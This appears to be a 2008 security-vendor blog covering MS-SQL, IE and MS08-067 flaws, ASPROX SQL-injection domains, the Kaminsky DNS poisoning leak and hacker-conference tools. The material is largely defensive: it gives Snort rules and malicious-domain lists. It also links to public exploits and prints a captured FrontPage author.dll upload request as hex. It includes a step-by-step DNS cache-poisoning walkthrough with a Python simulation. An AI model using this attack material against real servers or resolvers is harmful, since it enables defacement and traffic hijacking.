Tuesday, December 23, 2008

MS-SQL 0-day vulnerability remotely exploitable

Microsoft just announced the MS-SQL sp_replwritetovarbin vulnerability I blogged about last Wednesday, and it looks like
mainstream news
is just picking up and reporting on it.

The attack has now morphed into a critical remote flaw, as it's reported the bug can be reached through SQL injection. This is an ASPROX-type attack but much more dangerous: instead of just planting a script tag in the database, it lets the attacker run commands on the SQL server itself with the privileges of the SQL Server service (often an administrator account).

If you're a Sentinel IPS customer, the previous signature and our older SQL injection signatures adequately defend against this attack, so rest easy and enjoy the holidays!


Why is this considered a 0-day if we have known about it for a week? Well, there is exploit code available and no patch yet from Microsoft... We call that a 0-day, as attackers can wreak havoc with no patch available to defend with.

Wednesday, December 17, 2008

Internet Explorer XML 0-day and MS-SQL vulnerabilities

Two new critical MS vulnerabilities were disclosed earlier this month; the IE flaw (a memory corruption bug in IE's XML handling) is particularly nasty. This is a client-side bug which can be triggered by clicking a malicious link from anywhere, including emails...

This bug is rated "Extremely Critical"; the easiest workaround is to use Firefox for browsing until it is patched.

http://www.microsoft.com/technet/security/advisory/961051.mspx
http://secunia.com/advisories/33089/

The MS-SQL flaw has potential, but as disclosed it only allows privilege escalation by a user who can already run SQL against the server, not remote code execution.

http://www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt

Sentinel IPS has signatures to protect against both.

Exploit code release for the IE XML vuln:
http://www.milw0rm.com/exploits/7410
http://www.milw0rm.com/exploits/7477
http://www.milw0rm.com/exploits/7403

As always patch, patch, patch!

Saturday, November 15, 2008

Google to save the world

Ok, not really, but most of you have noticed Google now using its search heuristics to track outbreaks of the flu across North America. link

This could be exciting news for health and science, but what is more exciting to me in IT security is their integration of Google Safe Browsing into Firefox 3. To me this is the single most powerful and simple security feature added to a browser since the gold padlock indicating encryption.

Here is how it works: Google does all the heavy lifting and tracks malware infections by the site that distributes them. Once a site reaches a threshold of malware infections it is deemed unsafe and added to Google's anti-malware database. Google released an API so a browser can check a URL against that database in real time. So if you visit a site which is in the database you are redirected to a warning page letting you know the site is unsafe, with links to detailed information on the malware and the number of infections. You can of course bypass it and proceed to the site, but the average user will be effectively deterred from browsing it.

Firefox 3 now comes standard with this feature.

Did I mention Google is working to cure world hunger and cancer in ten years?

Thank you Google, really.

Monday, October 27, 2008

MS08-067 Windows Server Remote Exploit Information

We received a flood of requests from our customers asking whether Sentinel IPS protects against attacks on this new vulnerability. Once we assured them that several signatures are in place (thanks Emerging Threats!), I figured a follow-up with some information on the vulnerability would be helpful.

First, the vulnerability is a remote stack buffer overflow in the Windows Server service's handling of RPC (remote procedure call) requests, reachable over SMB (ports 139/445). It allows full code execution / system compromise over the wire, and on Windows 2000, XP and 2003 it needs no authentication at all.

Second, MS went public with information on this vulnerability on October 23rd, after it found evidence of active exploitation in the wild.

Is public exploit code available? "You betcha", http://www.milw0rm.com/exploits/6841

Which versions of Windows are vulnerable? Microsoft Windows 2000, Windows XP, Windows Vista, Windows 2003 Server and Windows Server 2008

Is there a patch or update available? Yes, MS pushed an emergency update (out-of-band patch, MS08-067) on Thursday, Oct 23rd. That gives you an idea how serious this is.

Doesn't my firewall protect against this? Yes, sort of... if you are denying ports 139 and 445 to the host from the Internet. But you are likely still vulnerable from your own LAN, and if your grandma plugs directly into her DSL modem and turned off that pesky Windows firewall (uh oh).

What happens when I am compromised? There is a worm/botnet currently spreading using this vulnerability; after a successful compromise it scans the local network for more vulnerable machines. This means an infected laptop carried inside the perimeter is an extremely high risk for spreading this worm.

What is the malware the worm spreads? Your standard auto-propagating trojan/malware/botnet client, currently going by the name Gimmiv (Win32.Gimmiv.a/b worm).

What can I do? Keep an eye on your machines, run the latest AV software and make sure your firewalls and IPS are protecting ports 139/445 wherever possible. Last but not least, patch patch patch!

Godspeed.

Tuesday, October 14, 2008

ASPROX still alive, deryv.ru

deryv.ru is the latest domain used by the ASPROX botnet's SQL injection attacks on insecure ASP websites.

Other current ASPROX domains include:
lang42.ru, s800qn.cn, s800qn.cn, ss11qn.cn

Grab our ASPROX toolkit for information on cleaning and defending from this threat.

Tuesday, October 7, 2008

To jailbreak or not to jailbreak the iPhone 3G

I am blogging right now through my newly jailbroken iPhone 3G with 2.1 firmware... using some blogging application and typing on the tiny keyboard, you may ask? Not today. I am in fact using PDAnet, a free Internet-sharing app for jailbroken iPhones which lets you connect your laptop (any variety) to your iPhone via ad-hoc wireless networking and then reach the Internet through the phone's 3G or EDGE connection.

I can say this app alone is reason enough to jailbreak your iPhone... I mean, Starbucks coffee is expensive enough, paying for their Internet access is a slap in the face.

So what other wonderful goodies are available exclusively to a jailbroken iPhone? Well, this is an information security blog, so how could I not talk about the excellent new Stumbler Plus app. It is a full-featured wardriving and wireless network auditing tool (GUI) and it is really quite sweet. Here are some features:

1. Finds hidden SSID's
2. Reverses AP MAC Addresses automatically to the Vendor name (COOL!)
3. Records Signal Strength, Encryption Type, and Long/Lat via GPS!

The only downsides I have found are that there is no automatic feature to keep scanning while you drive (it requires you to repeatedly hit the scan button), and it doesn't seem to have a save or email-results feature.

So those are the two killer jailbreak apps currently out for the iPhone 3G. I am sure some of you will wonder why I didn't mention nmap and Metasploit, but if you have tried to use either in the buggy xterm app with the tiny keyboard, it is not something to be desired. Maybe I will create a one-button GUI version of Metasploit that uses autopwn... hrmm, my list of projects is getting out of control.

Wednesday, October 1, 2008

Are you ready for IPv6?

Vint Cerf, one of the core developers of IPv4 and now an evangelist for Google, says time is running out for 32-bit IP addresses...

Article from timesonline.co.uk

So the question I pose is are you ready? To truly know, you have to ask yourself a few questions...

1. Does your ISP provide IPv6 connectivity (raw or tunneled)?

2. Most networking equipment and operating systems support IPv6, but does your security equipment? If you use IDS/IPS, it's highly probable IPv6 is not yet supported or requires a software update to get there. Snort, the industry-standard IDS, only gained IPv6 support in recent 2.6+ releases.

3. Do you understand the security architecture changes required for IPv6? Every node can have a globally routable address; with no more NAT, privacy and security will have to be re-evaluated, as every host becomes directly addressable.

For example, if Sally goes to website xyz.com from work behind a standard IPv4 NAT gateway, only the office's shared WAN IP is saved in xyz.com's access logs. Under IPv6 the website would log the address assigned specifically to Sally's computer and could route directly back to it without NAT translation. So not only could an attacker potentially tie the website visit to Sally, he would also know the direct address to attack her computer (unless a stateful firewall at the edge drops unsolicited inbound traffic, which is the IPv6 replacement for the accidental protection NAT gave you).

4. DNS will become more important: while there are ways to abbreviate IPv6 notation so you don't have to remember a lengthy hex string, you will more likely rely heavily on DNS to address your LAN machines.

5. Dual IP stack: most current operating systems like Vista, OS X and Linux run both IPv4 and IPv6 by default. Think of the two as separate layers, as you could be attacked over either protocol. Remember this when designing your IPv6 architecture so you do not leave a blind spot on either protocol's traffic.

Monday, September 8, 2008

LinuXploit Crew Frontpage author.dll core-project/1.0 attacks

Received some reports about widespread FrontPage Server Extensions attacks (old but still working). Example of a hacked site

Here is a quick Snort signature I whipped up for protection/detection, plus the associated traffic (thanks Jack Pepper for the tcpdump). Note that the core-project match keys on the attacker's User-Agent and is trivially changed; the uricontent checks on _vti_aut/author.dll are the durable part, and author.dll should not be reachable by unauthenticated POSTs in the first place:

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"WEB linuXploit crew Frontpage author.dll attempt"; flow:established,to_server; content:"POST"; nocase; uricontent:"_vti_aut/"; nocase; uricontent:"author.dll"; nocase; content:"core-project"; nocase; reference:url,infosec20.blogspot.com; classtype:web-application-attack; sid:3001728; rev:2;)


The User-Agent is: core-project/1.0

0x0030: 0000 0000 504f 5354 202f 5f76 7469 5f62 ....POST./_vti_b
0x0040: 696e 2f5f 7674 695f 6175 742f 6175 7468 in/_vti_aut/auth
0x0050: 6f72 2e64 6c6c 2048 5454 502f 312e 310d or.dll.HTTP/1.1.
0x0060: 0a4d 494d 452d 5665 7273 696f 6e3a 2031 .MIME-Version:.1
0x0070: 2e30 0d0a 5573 6572 2d41 6765 6e74 3a20 .0..User-Agent:.
0x0080: 636f 7265 2d70 726f 6a65 6374 2f31 2e30 core-project/1.0
0x0090: 0d0a 486f 7374 3a20 7777 7777 2e61 6161 ..Host:.wwww.aaa
0x00a0: 6161 612e 6564 750d 0a41 6363 6570 743a aaa.edu..Accept:
0x00b0: 2061 7574 682f 7369 6369 6c79 0d0a 436f .auth/sicily..Co
0x00c0: 6e74 656e 742d 4c65 6e67 7468 3a20 3132 ntent-Length:.12
0x00d0: 3037 0d0a 436f 6e74 656e 742d 5479 7065 07..Content-Type
0x00e0: 3a20 6170 706c 6963 6174 696f 6e2f 782d :.application/x-
0x00f0: 7665 726d 6565 722d 7572 6c65 6e63 6f64 vermeer-urlencod
0x0100: 6564 0d0a 582d 5665 726d 6565 722d 436f ed..X-Vermeer-Co
0x0110: 6e74 656e 742d 5479 7065 3a20 6170 706c ntent-Type:.appl
0x0120: 6963 6174 696f 6e2f 782d 7665 726d 6565 ication/x-vermee
0x0130: 722d 7572 6c65 6e63 6f64 6564 0d0a 436f r-urlencoded..Co
0x0140: 6e6e 6563 7469 6f6e 3a20 636c 6f73 650d nnection:.close.
0x0150: 0a43 6163 6865 2d43 6f6e 7472 6f6c 3a20 .Cache-Control:.
0x0160: 6e6f 2d63 6163 6865 0d0a 0d0a 6d65 7468 no-cache....meth
0x0170: 6f64 3d70 7574 2b64 6f63 756d 656e 7425 od=put+document%
0x0180: 3361 3425 3265 3025 3265 3225 3265 3437 3a4%2e0%2e2%2e47
0x0190: 3135 2673 6572 7669 6365 2535 666e 616d 15&service%5fnam
0x01a0: 653d 2664 6f63 756d 656e 743d 2535 6264 e=&document=%5bd
0x01b0: 6f63 756d 656e 7425 3566 6e61 6d65 2533 ocument%5fname%3
0x01c0: 6469 2532 6568 746d 2533 626d 6574 6125 di%2ehtm%3bmeta%
0x01d0: 3566 696e 666f 2533 6425 3562 2535 6425 5finfo%3d%5b%5d%
0x01e0: 3564 2670 7574 2535 666f 7074 696f 6e3d 5d&put%5foption=
0x01f0: 6f76 6572 7772 6974 6526 636f 6d6d 656e overwrite&commen
0x0200: 743d 266b 6565 7025 3566 6368 6563 6b65 t=&keep%5fchecke
0x0210: 6425 3566 6f75 743d 6661 6c73 650a 3c68 d%5fout=false.h
0x0220: 746d 6c3e 0d0a 3c68 6561 643e 0d0a 3c74 tml..head..t
0x0230: 6974 6c65 3e6c 696e 7558 706c 6f69 745f itle linuXploit_
0x0240: 6372 6577 3c2f 7469 746c 653e 0d0a 3c6d crew /title..m
0x0250: 6574 6120 6874 7470 2d65 7175 6976 3d22 eta.http-equiv="
0x0260: 436f 6e74 656e 742d 5479 7065 2220 636f Content-Type".co
0x0270: 6e74 656e 743d 2274 6578 742f 6874 6d6c ntent="text/html
0x0280: 3b20 6368 6172 7365 743d 6973 6f2d 3838 ;.charset=iso-88
0x0290: 3539 2d31 223e 0d0a 3c2f 6865 6164 3e0d 59-1"../head.
0x02a0: 0a0d 0a3c 626f 6479 2062 6763 6f6c 6f72 ...body.bgcolor
0x02b0: 3d22 2346 4646 4646 4622 3e0d 0a3c 6469 ="#FFFFFF"..di
0x02c0: 7620 616c 6967 6e3d 2263 656e 7465 7222 v.align="center"
0x02d0: 3e0d 0a20 203c 703e 3c66 6f6e 7420 7369 ....pfont.si
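To show exactly what the rule above keys on, here is an added example (my code for this write-up, not part of the original capture or of any tool) that rebuilds the request bytes from the first nine lines of the tcpdump hex dump above and applies the same four conditions as the Snort rule. The capture lines are copied from the dump; the function names are my own.

```python
import re

# Hex dump lines copied from the capture above (tcpdump -X output, truncated after the
# Accept header). Each line is "<offset>: <8 hex words> <ascii column>"; the first four
# bytes on the 0x0030 line are the tail of the TCP header, the HTTP request starts at POST.
CAPTURE = """\
0x0030: 0000 0000 504f 5354 202f 5f76 7469 5f62 ....POST./_vti_b
0x0040: 696e 2f5f 7674 695f 6175 742f 6175 7468 in/_vti_aut/auth
0x0050: 6f72 2e64 6c6c 2048 5454 502f 312e 310d or.dll.HTTP/1.1.
0x0060: 0a4d 494d 452d 5665 7273 696f 6e3a 2031 .MIME-Version:.1
0x0070: 2e30 0d0a 5573 6572 2d41 6765 6e74 3a20 .0..User-Agent:.
0x0080: 636f 7265 2d70 726f 6a65 6374 2f31 2e30 core-project/1.0
0x0090: 0d0a 486f 7374 3a20 7777 7777 2e61 6161 ..Host:.wwww.aaa
0x00a0: 6161 612e 6564 750d 0a41 6363 6570 743a aaa.edu..Accept:
0x00b0: 2061 7574 682f 7369 6369 6c79 0d0a 436f .auth/sicily..Co
"""

HEX_WORD = re.compile(r"^(?:[0-9a-f]{4}|[0-9a-f]{2})$", re.IGNORECASE)


def parse_tcpdump_hex(dump):
    """Rebuild raw bytes from tcpdump -X style lines.

    Only the hex words are used: at most 8 tokens after the offset, stopping at the first
    token that is not pure hex, so the ASCII column (which can itself look hex-ish, e.g.
    "aaaaaa.edu") is never decoded.
    """
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if not tokens or not tokens[0].endswith(":"):
            continue
        words = []
        for tok in tokens[1:]:
            if len(words) == 8 or not HEX_WORD.match(tok):
                break
            words.append(tok)
        out += bytes.fromhex("".join(words))
    return bytes(out)


def parse_request(payload):
    """Split an HTTP request into method, URI and headers (bytes in, str out)."""
    payload = payload.lstrip(b"\x00")            # drop the TCP header tail
    head = payload.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        return None
    headers = {}
    for line in lines[1:]:
        if b": " in line:
            name, value = line.split(b": ", 1)
            headers[name.decode("latin-1")] = value.decode("latin-1")
    return {"method": parts[0].decode("latin-1"),
            "uri": parts[1].decode("latin-1"),
            "headers": headers}


def matches_author_dll_rule(payload):
    """Same four conditions as the Snort rule: POST, _vti_aut/ and author.dll in the
    URI, and 'core-project' anywhere in the request, all case-insensitive."""
    req = parse_request(payload)
    if req is None:
        return False
    uri = req["uri"].lower()
    return (req["method"].upper() == "POST"
            and "_vti_aut/" in uri
            and "author.dll" in uri
            and b"core-project" in payload.lower())


if __name__ == "__main__":
    pkt = parse_tcpdump_hex(CAPTURE)
    print(parse_request(pkt))
    print("alert" if matches_author_dll_rule(pkt) else "no match")
```

The one difference from the rule is that the Python check requires POST to be the request method, whereas the Snort content:"POST" match fires on that string anywhere in the stream.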

Friday, August 22, 2008

RedHat Linux Compromised

Last night Red Hat Inc. announced that their main distribution servers were compromised, and this morning patches were released to replace the tampered OpenSSH packages.

This is an incredibly interesting attack vector: OpenSSH packages for both Red Hat Enterprise Linux v4 and v5 and for Fedora were modified, with attackers essentially adding their own key to the front door (ssh) of the operating system. If you have installed RHEL or Fedora from ftp or http sources recently you will certainly need to run "yum update" and check your installed OpenSSH packages against Red Hat's blacklist below.

https://www.redhat.com/archives/fedora-announce-list/2008-August/msg00012.html
https://rhn.redhat.com/errata/RHSA-2008-0855.html
http://www.redhat.com/security/data/openssh-blacklist.html

Thursday, August 21, 2008

Blackhat / Defcon 2008 Security Tool Round-up

Now that Blackhat and Defcon are over and most of us have recovered from the associated hangovers, it's high time we review some of the great projects released at the events:

Karmasploit



This addition to the Metasploit SVN tree includes the KARMA wireless attack toolkit, enabling fake-AP hijacking and side-jacking attacks. If you thought your CEO was in danger at Starbucks before, now you really have to look out! Karmasploit makes hijacking sessions, capturing passwords and redirecting traffic mind-numbingly easy. In addition, "airbase" (airbase-ng from the aircrack-ng suite) provides the fake access point with injection support, so the attacks work with most off-the-shelf wireless cards.

http://metasploit.com/dev/trac/wiki/Karmetasploit


Grendelscan



A new cross-platform, full-featured web application penetration testing tool. Grendelscan fills the void for a free, open-source tool that is cross-platform (Win/Linux/OSX), has a nice GUI and a very advanced feature set including XSS, SQL injection, HTTP fuzzing and standard misconfiguration checks powered by an updated set of Nikto signatures. With HP and many others releasing watered-down free applications, I see Grendelscan quickly becoming THE de facto tool in web app vulnerability testing.

http://grendel-scan.com/

Beholder



An open-source wireless IDS, with detection for injection, replay attacks, rogue APs and hijacking attempts. Sounds like a promising tool, especially for small to medium businesses that want a view into their wireless space but have little budget for the mostly commercial WIDS systems. Yes, Kismet does some of this, but it was originally designed for wardriving and is not as fully featured as Beholder claims to be.

http://www.beholderwireless.org/

Nmap



Obviously not a new tool, but Fyodor announced extensive upgrades to the newest development version of nmap at Defcon. The most interesting upgrades are faster scanning based on the most common ports, better OS detection and, last but not least, a rockin' new revamped GUI, Zenmap, which has a mind-blowing network mapping function that auto-creates a network topology map showing host associations, with the ability to pan and zoom (the demo of this feature had the crowd in an uproar of excitement). Zenmap supports OS X in addition to Windows and Linux.

http://nmap.org/zenmap/


Voiper



Voiper is a toolkit for fuzzing and attacking VOIP protocols and devices. It currently only supports the SIP protocol but seems like a promising tool for penetration testing VOIP.

http://sourceforge.net/projects/voiper/

Tuesday, August 5, 2008

Defcon 2008 Party Round Up

I compiled a list of parties going on at Defcon 16 this year, so I am tracking them here to share with the security/beer lovers' community.

Core Security Customer Briefing and Cocktail Party
Date: Thursday, August 7
Cocktail party: 6:30-8:30pm
Location: Sushi Roku in The Forum Shops at Caesars
Info: Requires RSVP and Pass obtained at Core booth at Blackhat

Ethical Hacker Network Party
When: Thurs evening, Aug 7, 2008 from 8:00 - 11:00pm
Where: Hofbrauhaus Las Vegas

Microsoft Party
When: Thurs night 12pm
Where: Location TBD
Info: Invite only, bring your glowsticks and they will supply alcohol and bluescreens

StillSecure Freakshow Party
When: Sat Aug 9th 9pm-1am
Where: Top of the Riviera (roof?)
Info: Free booze and prizes if you dress up like a freak?

What: theSummit EFF/THF Fund Raiser
When: Thursday, August 7th, 2008, 9pm-12am
Where: TBD (Either the Skyboxes OR Top of the Riv)


Non corporate sponsored:

Hacker Pimps
When: Fri Aug 8th 9pm-2am
Where: Riviera Skybox 207 and 208

Spiders are Fun Party
When: Fri Aug 8th ?pm-?am
Where: Riviera Skybox 206


Email me if you know of any others which are not listed here: gregm @ econet dot com



Oh and if you were curious about the female attendance at Defcon make sure to read this wired article

Monday, August 4, 2008

ASPROX Latest Attack Vector: JS.JS

Most ASPROX SQL injection attacks are now using js.js as the payload file name.

Grab our ASPROX toolkit for information on cleaning and defending from this threat.

Here are the latest ASPROX domains detected:

www.porv.ru/js.js
www.ncbw.ru/js.js
www.98hs.ru/js.js
www.nwj4.ru/js.js
www.bywd.ru/js.js
www.bgsr.ru/js.js
www.ibse.ru/js.js
www.uhwc.ru/js.js
www.ojns.ru/js.js
www.8hcs.ru/js.js
mo98g.cn/q.js
abc.verynx.cn/w.js
www.bosf.ru/js.js
www.bnsr.ru/js.js
www.ch35.ru/js.js
www.jve4.ru/js.js
www.nmr43.ru/js.js
www.bce8.ru/js.js
www.ncwc.ru/js.js
www.njep.ru/js.js
www.bjxt.ru/js.js
www.b4so.ru/js.js
www.kj5s.ru/js.js
www.oics.ru/js.js
www.po4c.ru/js.js
www.kjwd.ru/js.js
www.bsko.ru/js.js
www.pfd2.ru/js.js
www.iroe.ru/js.js
www.gty5.ru/js.js
www.kpo3.ru/js.js
www.ncb2.ru/js.js
www.kr92.ru/js.js

Monday, July 28, 2008

You have a new update available...

On the tail of the huge DNS flaw, the Argentinian group Infobyte Security Research has released a shocking new tool to exploit insecure application updates using man-in-the-middle attacks, including Kaminsky's DNS poisoning.

Essentially, "Evilgrade" is both an attack toolkit and a mock update server framework: it redirects an application's update check to the host running Evilgrade, which then serves a malicious "update". If successful, full system compromise is possible, giving the attacker a passive way to amass a botnet.

Evilgrade has support for exploiting the following popular programs' update services:
Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar

So what is the upside to such a scary tool? It will likely force developers to create a secure process for pushing updates, probably signing each update and verifying the signature against a key shipped with the application (some sort of PKI architecture), since DNS alone clearly cannot be trusted to identify the update server.

Thursday, July 24, 2008

Kaminsky DNS Cache Poisoning PoC Exploit in Metasploit SVN

Looks like Druid and HDM have released a proof-of-concept exploit in Metasploit to attack nameservers using Kaminsky's now-leaked vulnerability. This is huge, because not only is the attack unbelievably easy to execute, 95% of the Internet is still vulnerable!

This is a historical moment in IT Security and will be a very, very busy day for those of us on the defense side.

Exploit Code:

http://www.caughq.org/exploits/CAU-EX-2008-0002.txt

http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

Or simply grab the latest metasploit:

svn co http://metasploit.com/svn/framework3/trunk/

Snort signatures I wrote for Emerging Threats:

alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible NS RR Cache Poisoning Attempt"; content: "|85 00 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src,count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008447; rev:10;)

alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible A RR Cache Poisoning Attempt"; content: "|81 80 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src, count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008457; rev:10;)


*** Update ***
A new Metasploit module is out this morning which allows you to poison the cached NS record for an entire domain. This means if you have an evil nameserver ready to take the requests, you mass-own entire domains such as google, microsoft, etc. Scary stuff.

http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html

Tuesday, July 22, 2008

Major DNS Flaw revealed

The Security blogosphere is exploding with chatter today about leaked details of Dan Kaminsky's multi-vendor DNS flaw.

Here is how it works (according to leak):

Mallory wants to poison the server ns.polya.com.

Mallory sends NS requests for ulam00001.com, ulam00002.com ... to ns.polya.com.

Mallory then sends forged answers saying that the NS for www.ulam00002.com is ns.google.com *AND* puts in a glue record saying that ns.google.com is 66.6.6.6.

Because the glue record corresponds with the answer record (same domain), the targeted nameserver will cache it, or replace its current record of ns.google.com with 66.6.6.6. Mallory only has to get a forged reply in before the real one with a matching 16-bit transaction ID, and can keep trying with a fresh ulam0000N.com name each time, which is why the vendor fix adds source-port randomization on top of the ID.
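As an added illustration (not from the post, the leak, or any real resolver's code), here is a toy resolver in Python that models the record-replacement step described above: a reply is only accepted if its transaction ID matches an outstanding query, and, when the bailiwick rule is enforced, a record is only cached if its owner name lies under the zone the question was about. The names and the 66.6.6.6 address are the ones from the leak; 192.0.2.1 is a placeholder for the legitimate address, and zone_of() is a deliberate simplification (real resolvers use the zone of the server they queried). The last case in the usage note goes beyond the leaked scenario: Kaminsky's actual technique asks for random names inside the target's own zone, so the forged glue is in-bailiwick and passes the check, leaving the 16-bit transaction ID as the only protection.

```python
import random
from dataclasses import dataclass


@dataclass(frozen=True)
class RR:
    name: str    # owner name, e.g. "ns.google.com"
    rtype: str   # "NS" or "A"
    rdata: str   # NS target name, or IPv4 address for an A record


@dataclass
class Response:
    txid: int
    qname: str
    answer: list       # answer section
    additional: list   # additional section (glue)


def zone_of(qname):
    """Simplification: the zone a question is 'about' is the name minus its leftmost label
    (www.ulam00002.com -> ulam00002.com). Real resolvers use the zone of the server queried."""
    return qname.split(".", 1)[1]


def in_bailiwick(owner, zone):
    """The bailiwick rule: only trust a record whose owner is the zone or lies beneath it."""
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return owner == zone or owner.endswith("." + zone)


class ToyResolver:
    def __init__(self, enforce_bailiwick):
        self.enforce_bailiwick = enforce_bailiwick
        self.cache = {}      # (owner, rtype) -> rdata
        self.pending = {}    # txid -> qname of an outstanding query

    def send_query(self, qname):
        txid = random.randrange(0, 1 << 16)   # 16-bit ID: all the attacker has to guess
        self.pending[txid] = qname
        return txid

    def receive(self, resp):
        """Cache what a reply carries; returns the records accepted ([] if it was dropped)."""
        qname = self.pending.get(resp.txid)
        if qname is None or qname.lower() != resp.qname.lower():
            return []        # unknown ID or wrong question: a forged reply that lost the race
        del self.pending[resp.txid]
        zone = zone_of(qname)
        accepted = []
        for rr in resp.answer + resp.additional:
            if self.enforce_bailiwick and not in_bailiwick(rr.name, zone):
                continue     # out-of-bailiwick glue is ignored rather than cached
            self.cache[(rr.name.lower(), rr.rtype)] = rr.rdata   # no credibility check: overwrite
            accepted.append(rr)
        return accepted


def forge_reply(qname, guessed_txid):
    """Mallory's reply from the leak: NS for qname is ns.google.com, plus glue ns.google.com = 66.6.6.6."""
    return Response(txid=guessed_txid, qname=qname,
                    answer=[RR(qname, "NS", "ns.google.com")],
                    additional=[RR("ns.google.com", "A", "66.6.6.6")])


def poison(resolver, qname, guessed_txid):
    """One forged reply against the resolver's outstanding query for qname."""
    return resolver.receive(forge_reply(qname, guessed_txid))


if __name__ == "__main__":
    for enforce in (False, True):
        r = ToyResolver(enforce)
        r.cache[("ns.google.com", "A")] = "192.0.2.1"   # placeholder legitimate address
        txid = r.send_query("www.ulam00002.com")
        poison(r, "www.ulam00002.com", txid)
        print("bailiwick enforced:", enforce, "-> ns.google.com =", r.cache[("ns.google.com", "A")])
```

Run as written, the first pass (no bailiwick rule) overwrites ns.google.com with 66.6.6.6 as in the leak, and the second pass keeps 192.0.2.1 because ns.google.com is not under ulam00002.com. Send the query for a name under google.com instead (for example ulam00003.google.com) and the enforcing resolver is poisoned too, as long as the guessed transaction ID matches.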

http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html

Make sure to read the comments for details of the original leak (Matasano's blog). The drama: Matasano originally called BS on the flaw, forcing Dan to back it up with a phone briefing; Thomas Ptacek then retracted his BS claims under the agreement that he would keep quiet. Now the same guy who leaked the technical details is attempting to apologize... What a jerk.

http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/

Updated ASPROX Toolkit

We have a new tool kit available with the following important additions:

T-SQL code for cleaning infected databases.

URLScan configuration instructions for catching injection attempts.

click here to grab the new tool kit

Thursday, July 10, 2008

ASPROX Domain Master List

adwnetw.com, bnsdrv.com, butdrv.com, cdrpoex.com, crtbond.com, destad.mobi, drvadw.com, gbradw.com, loopadd.com, porttw.mobi, pyttco.com, tertad.mobi, usaadw.com, usabnr.com, apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com, tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn, app52.com, appid37.com, apps84.com, asp27.com, asp72.com, script46.com, ssl39.com, st212.com, cid26.com, dl251.com, getbwd.com, st212.com, asp707.com, aspssl63.com, aspx49.com, batch29.com, bin963.com, bios47.com, hlpgetw.com, lang34.com, update34.com, westpacsecuresite.com, nihaorr1.com, free.hostpinoy.info, xprmn4u.info, nmidahena.com, winzipices.cn, sb.5252.ws, aspder.com, 11910.net, bbs.jueduizuan.com, bluell.cn, 2117966.net, s.see9.us, xvgaoke.cn, 1.hao929.cn, 414151.com, cc.18dd.net, yl18.net, kisswow.com.cn, urkb.net, c.uc8010.com, rnmb.net, ririwow.cn, killwow1.cn, xiaobaishan.net, qiqigm.com, wowgm1.cn, wowyeye.cn, 9i5t.cn, c11.8866.org, computershello.cn, tlcn.net, z008.net, b15.3322.org, qiqicc.cn, direct84.com, heihei117.cn, caocaowow.cn, qiuxuegm.com, locale48.com, firestnamestea.cn, fami4ka.net, redir94.com, rexec39.com, en-us18.com, ck1.in, adjuncnet.com, rundll92.com, sysid72.com, n.uc8010.com, libid53.com, qiqi111.cn, heartgames.cn, logid83.com, datajto.com, adw95.com, 
tjwh202.162.ns98.cn, jetadwor.com, cookieadw.com, bannerupd.com, nb88.cn, bigadnet.com, 1.cool0.biz, updatebnr.com, flyzhu.9966.org, sslnet72.com, advertbnr.com, script46.com, fengnima.cn, tag58.com, banner82.com, smeisp.cn, hoursebuilds.cn, hyperadw.com, adsitelo.com, okey123.cn, b.kaobt.cn, getadw.com, nihao112.com, al.99.vc, aidushu.net, a.13175.com, chliyi.com, free.edivid.info, 52-o.cn, fucksb.net, 0.actualization.cn, d39.6600.org, h28.8800.org, 001yl.com, ucmal.com, t.uc8010.com, dota11.cn, pingbnr.com, bnrcompro.com, y66.us, m11.3322.org, bc0.cn, clsidw.com, adword71.com, killpp.cn, bnradw.com, cmiia.com, sslput4.com, exe94.com, bnrcntrl.com, w11.6600.org, usuc.us, hlpadw.com, jumpbnr.com, advabnr.com, siteid38.com, msshamof.com, refer68.com, newasp.com.cn, wowgm2.cn, mm.jsjwh.com.cn, updatead.com, win496.com, usuc.us, view89.com, 17ge.cn, err68.com, upgradead.com, adword72.com, kk6.us, clickbnr.com, 117275.cn, c23.2288.org, sysid72.com, encode72.com, exec51.com, pingadw.com, vb008.cn, wow112.cn, nihaoel3.com, p060523.info, o7n9.cn, rundll841.com, jetdbs.com, dbdomaine.com, domaincld.com, clsiduser.com, heiheinn.cn, coldwop.com, alzhead.com, chinabnr.com, adwbnr.com, chkbnr.com, chkadw.com

ASPROX Botnet up to 16,500 Zombies

Just a quick update, ASPROX is currently around 16,500 zombies up from 12k last week.

Get the updated IP list of the infected zombie hosts

And make sure to grab our ASPROX information toolkit

Monday, July 7, 2008

